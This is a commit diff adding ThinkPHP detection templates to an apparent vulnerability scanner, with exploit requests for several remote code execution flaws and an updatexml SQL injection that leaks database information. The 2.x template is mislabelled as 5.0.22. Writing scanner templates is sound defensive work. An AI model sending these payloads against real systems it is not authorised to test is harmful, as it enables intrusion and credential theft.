Added ThinkPHP templates and signature.

technologies/tech-detect.yaml

@@ -2747,3 +2747,10 @@ requests:
         part: header
         words:
           - 'Server: monit'
+          
+      - type: word
+        name: thinkphp
+        words:
+          - "ThinkPHP"
+        part: header
+        

vulnerabilities/thinkphp/thinkphp-2-rce.yaml

@@ -0,0 +1,24 @@
+id: thinkphp-2-rce
+
+info:
+  name: ThinkPHP 5.0.22 RCE
+  author: dr_set
+  severity: critical
+  description: ThinkPHP 2.x version and 3.0 in Lite mode Remote Code Execution.
+  
+  # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?s=/index/index/name/$%7B@phpinfo()%7D"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+        condition: and
+      - type: status
+        status:
+          - 200

vulnerabilities/thinkphp/thinkphp-5022-rce.yaml

@@ -0,0 +1,24 @@
+id: thinkphp-5022-rce
+
+info:
+  name: ThinkPHP 5.0.22 RCE
+  author: dr_set
+  severity: critical
+  description: Thinkphp5 5.0.22/5.1.29 Remote Code Execution if the website doesn't have mandatory routing enabled (which is default).
+  
+  # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+        condition: and
+      - type: status
+        status:
+          - 200

vulnerabilities/thinkphp/thinkphp-5023-rce.yaml

@@ -0,0 +1,27 @@
+id: thinkphp-5023-rce
+
+info:
+  name: ThinkPHP 5.0.23 RCE
+  author: dr_set
+  severity: critical
+  description: Thinkphp5 5.0(<5.0.24) Remote Code Execution.
+  
+  # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/index.php?s=captcha"
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+        condition: and
+      - type: status
+        status:
+          - 200

vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml

@@ -0,0 +1,24 @@
+id: thinkphp-509-information-disclosure
+
+info:
+  name: ThinkPHP 5.0.9 Information Disclosure
+  author: dr_set
+  severity: critical
+  description: Verbose SQL error message reveals sensitive information including database credentials.
+  
+  # reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection
+  
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "SQLSTATE"
+          - "XPATH syntax error"
+        condition: and
+      - type: status
+        status:
+          - 500